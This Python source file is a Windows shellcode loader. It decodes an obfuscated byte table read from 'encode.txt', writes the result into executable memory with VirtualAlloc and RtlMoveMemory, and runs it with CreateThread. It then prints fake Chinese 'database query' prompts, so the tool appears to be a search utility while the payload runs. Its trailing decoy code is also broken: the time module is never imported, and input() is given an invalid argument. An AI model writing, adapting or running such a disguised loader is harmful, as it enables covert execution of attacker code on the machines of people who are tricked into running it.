import ctypes


file = open('encode.txt','r',encoding='utf-8')
readl = file.readlines()
strshellcode = 'shellcode = b\''
for shellname in readl:
    shellname = shellname.replace('\n','')
    if shellname == '団0':strshellcode = strshellcode + '\\xfc'
    if shellname == '団1':strshellcode = strshellcode + '\\x48'
    if shellname == '団2':strshellcode = strshellcode + '\\x83'
    if shellname == '団3':strshellcode = strshellcode + '\\xe4'
    if shellname == '団4':strshellcode = strshellcode + '\\xf0'
    if shellname == '団5':strshellcode = strshellcode + '\\xe8'
    if shellname == '団6':strshellcode = strshellcode + '\\xc8'
    if shellname == '団7':strshellcode = strshellcode + '\\x00'
    if shellname == '団8':strshellcode = strshellcode + '\\x41'
    if shellname == '団9':strshellcode = strshellcode + '\\x51'
    if shellname == '団10':strshellcode = strshellcode + '\\x50'
    if shellname == '団11':strshellcode = strshellcode + '\\x52'
    if shellname == '団12':strshellcode = strshellcode + '\\x56'
    if shellname == '団13':strshellcode = strshellcode + '\\x31'
    if shellname == '団14':strshellcode = strshellcode + '\\xd2'
    if shellname == '団15':strshellcode = strshellcode + '\\x65'
    if shellname == '団16':strshellcode = strshellcode + '\\x8b'
    if shellname == '団17':strshellcode = strshellcode + '\\x60'
    if shellname == '団18':strshellcode = strshellcode + '\\x18'
    if shellname == '団19':strshellcode = strshellcode + '\\x20'
    if shellname == '団20':strshellcode = strshellcode + '\\x72'
    if shellname == '団21':strshellcode = strshellcode + '\\x0f'
    if shellname == '団22':strshellcode = strshellcode + '\\xb7'
    if shellname == '団23':strshellcode = strshellcode + '\\x4a'
    if shellname == '団24':strshellcode = strshellcode + '\\x4d'
    if shellname == '団25':strshellcode = strshellcode + '\\xc9'
    if shellname == '団26':strshellcode = strshellcode + '\\xc0'
    if shellname == '団27':strshellcode = strshellcode + '\\xac'
    if shellname == '団28':strshellcode = strshellcode + '\\x3c'
    if shellname == '団29':strshellcode = strshellcode + '\\x61'
    if shellname == '団30':strshellcode = strshellcode + '\\x7c'
    if shellname == '団31':strshellcode = strshellcode + '\\x02'
    if shellname == '団32':strshellcode = strshellcode + '\\x2c'
    if shellname == '団33':strshellcode = strshellcode + '\\xc1'
    if shellname == '団34':strshellcode = strshellcode + '\\x0d'
    if shellname == '団35':strshellcode = strshellcode + '\\x01'
    if shellname == '団36':strshellcode = strshellcode + '\\xe2'
    if shellname == '団37':strshellcode = strshellcode + '\\xed'
    if shellname == '団38':strshellcode = strshellcode + '\\x42'
    if shellname == '団39':strshellcode = strshellcode + '\\xd0'
    if shellname == '団40':strshellcode = strshellcode + '\\x66'
    if shellname == '団41':strshellcode = strshellcode + '\\x81'
    if shellname == '団42':strshellcode = strshellcode + '\\x78'
    if shellname == '団43':strshellcode = strshellcode + '\\x0b'
    if shellname == '団44':strshellcode = strshellcode + '\\x75'
    if shellname == '団45':strshellcode = strshellcode + '\\x80'
    if shellname == '団46':strshellcode = strshellcode + '\\x88'
    if shellname == '団47':strshellcode = strshellcode + '\\x85'
    if shellname == '団48':strshellcode = strshellcode + '\\x74'
    if shellname == '団49':strshellcode = strshellcode + '\\x67'
    if shellname == '団50':strshellcode = strshellcode + '\\x44'
    if shellname == '団51':strshellcode = strshellcode + '\\x40'
    if shellname == '団52':strshellcode = strshellcode + '\\x49'
    if shellname == '団53':strshellcode = strshellcode + '\\xe3'
    if shellname == '団54':strshellcode = strshellcode + '\\xff'
    if shellname == '団55':strshellcode = strshellcode + '\\x34'
    if shellname == '団56':strshellcode = strshellcode + '\\xd6'
    if shellname == '団57':strshellcode = strshellcode + '\\x38'
    if shellname == '団58':strshellcode = strshellcode + '\\xe0'
    if shellname == '団59':strshellcode = strshellcode + '\\xf1'
    if shellname == '団60':strshellcode = strshellcode + '\\x4c'
    if shellname == '団61':strshellcode = strshellcode + '\\x03'
    if shellname == '団62':strshellcode = strshellcode + '\\x24'
    if shellname == '団63':strshellcode = strshellcode + '\\x08'
    if shellname == '団64':strshellcode = strshellcode + '\\x45'
    if shellname == '団65':strshellcode = strshellcode + '\\x39'
    if shellname == '団66':strshellcode = strshellcode + '\\xd1'
    if shellname == '団67':strshellcode = strshellcode + '\\xd8'
    if shellname == '団68':strshellcode = strshellcode + '\\x58'
    if shellname == '団69':strshellcode = strshellcode + '\\x0c'
    if shellname == '団70':strshellcode = strshellcode + '\\x1c'
    if shellname == '団71':strshellcode = strshellcode + '\\x04'
    if shellname == '団72':strshellcode = strshellcode + '\\x5e'
    if shellname == '団73':strshellcode = strshellcode + '\\x59'
    if shellname == '団74':strshellcode = strshellcode + '\\x5a'
    if shellname == '団75':strshellcode = strshellcode + '\\xec'
    if shellname == '団76':strshellcode = strshellcode + '\\x12'
    if shellname == '団77':strshellcode = strshellcode + '\\xe9'
    if shellname == '団78':strshellcode = strshellcode + '\\x4f'
    if shellname == '団79':strshellcode = strshellcode + '\\x5d'
    if shellname == '団80':strshellcode = strshellcode + '\\x6a'
    if shellname == '団81':strshellcode = strshellcode + '\\xbe'
    if shellname == '団82':strshellcode = strshellcode + '\\x77'
    if shellname == '団83':strshellcode = strshellcode + '\\x69'
    if shellname == '団84':strshellcode = strshellcode + '\\x6e'
    if shellname == '団85':strshellcode = strshellcode + '\\x89'
    if shellname == '団86':strshellcode = strshellcode + '\\xe6'
    if shellname == '団87':strshellcode = strshellcode + '\\xba'
    if shellname == '団88':strshellcode = strshellcode + '\\x26'
    if shellname == '団89':strshellcode = strshellcode + '\\x07'
    if shellname == '団90':strshellcode = strshellcode + '\\xd5'
    if shellname == '団91':strshellcode = strshellcode + '\\x3a'
    if shellname == '団92':strshellcode = strshellcode + '\\x79'
    if shellname == '団93':strshellcode = strshellcode + '\\xa7'
    if shellname == '団94':strshellcode = strshellcode + '\\xeb'
    if shellname == '団95':strshellcode = strshellcode + '\\x73'
    if shellname == '団96':strshellcode = strshellcode + '\\xb8'
    if shellname == '団97':strshellcode = strshellcode + '\\x5c'
    if shellname == '団98':strshellcode = strshellcode + '\\x11'
    if shellname == '団99':strshellcode = strshellcode + '\\x57'
    if shellname == '団100':strshellcode = strshellcode + '\\x9f'
    if shellname == '団101':strshellcode = strshellcode + '\\xc6'
    if shellname == '団102':strshellcode = strshellcode + '\\x5b'
    if shellname == '団103':strshellcode = strshellcode + '\\x68'
    if shellname == '団104':strshellcode = strshellcode + '\\x84'
    if shellname == '団105':strshellcode = strshellcode + '\\x55'
    if shellname == '団106':strshellcode = strshellcode + '\\x2e'
    if shellname == '団107':strshellcode = strshellcode + '\\x3b'
    if shellname == '団108':strshellcode = strshellcode + '\\xc3'
    if shellname == '団109':strshellcode = strshellcode + '\\x0a'
    if shellname == '団110':strshellcode = strshellcode + '\\x5f'
    if shellname == '団111':strshellcode = strshellcode + '\\xda'
    if shellname == '団112':strshellcode = strshellcode + '\\xc7'
    if shellname == '団113':strshellcode = strshellcode + '\\x2d'
    if shellname == '団114':strshellcode = strshellcode + '\\x06'
    if shellname == '団115':strshellcode = strshellcode + '\\x7b'
    if shellname == '団116':strshellcode = strshellcode + '\\x9d'
    if shellname == '団117':strshellcode = strshellcode + '\\xcf'
    if shellname == '団118':strshellcode = strshellcode + '\\x8c'
    if shellname == '団119':strshellcode = strshellcode + '\\xd3'
    if shellname == '団120':strshellcode = strshellcode + '\\xa2'
    if shellname == '団121':strshellcode = strshellcode + '\\x2f'
    if shellname == '団122':strshellcode = strshellcode + '\\x6f'
    if shellname == '団123':strshellcode = strshellcode + '\\x7a'
    if shellname == '団124':strshellcode = strshellcode + '\\x6c'
    if shellname == '団125':strshellcode = strshellcode + '\\x30'
    if shellname == '団126':strshellcode = strshellcode + '\\x28'
    if shellname == '団127':strshellcode = strshellcode + '\\x63'
    if shellname == '団128':strshellcode = strshellcode + '\\x6d'
    if shellname == '団129':strshellcode = strshellcode + '\\x70'
    if shellname == '団130':strshellcode = strshellcode + '\\x62'
    if shellname == '団131':strshellcode = strshellcode + '\\x53'
    if shellname == '団132':strshellcode = strshellcode + '\\x37'
    if shellname == '団133':strshellcode = strshellcode + '\\x64'
    if shellname == '団134':strshellcode = strshellcode + '\\x4e'
    if shellname == '団135':strshellcode = strshellcode + '\\x54'
    if shellname == '団136':strshellcode = strshellcode + '\\x35'
    if shellname == '団137':strshellcode = strshellcode + '\\x29'
    if shellname == '団138':strshellcode = strshellcode + '\\xb5'
    if shellname == '団139':strshellcode = strshellcode + '\\x10'
    if shellname == '団140':strshellcode = strshellcode + '\\xb9'
    if shellname == '団141':strshellcode = strshellcode + '\\xa4'
    if shellname == '団142':strshellcode = strshellcode + '\\xe5'
    if shellname == '団143':strshellcode = strshellcode + '\\x93'
    if shellname == '団144':strshellcode = strshellcode + '\\xe7'
    if shellname == '団145':strshellcode = strshellcode + '\\xf9'
    if shellname == '団146':strshellcode = strshellcode + '\\x96'
    if shellname == '団147':strshellcode = strshellcode + '\\xc4'
    if shellname == '団148':strshellcode = strshellcode + '\\xb6'
    if shellname == '団149':strshellcode = strshellcode + '\\xd7'
    if shellname == '団150':strshellcode = strshellcode + '\\x05'
    if shellname == '団151':strshellcode = strshellcode + '\\xfd'
    if shellname == '団152':strshellcode = strshellcode + '\\x32'
    if shellname == '団153':strshellcode = strshellcode + '\\x36'

strshellcode = strshellcode +'\''

exec(strshellcode)

ctypes.windll.kernel32.VirtualAlloc.restype=ctypes.c_uint64
rwxpage = ctypes.windll.kernel32.VirtualAlloc(0, len(shellcode), 0x1000, 0x40)
ctypes.windll.kernel32.RtlMoveMemory(ctypes.c_uint64(rwxpage), ctypes.create_string_buffer(shellcode), len(shellcode))
handle = ctypes.windll.kernel32.CreateThread(0, 0, ctypes.c_uint64(rwxpage), 0, 0, 0)
ctypes.windll.kernel32.WaitForSingleObject(handle, -1)
print('正在连接数据库...')
time.sleep(5)
print('生成临时token...')
time.sleep(2)
print('\n\n\n')
inp = input('[*]请输入查询内容:',end='')
print(f'正在搜索{inp}(请挂在后台耐心等待)...')
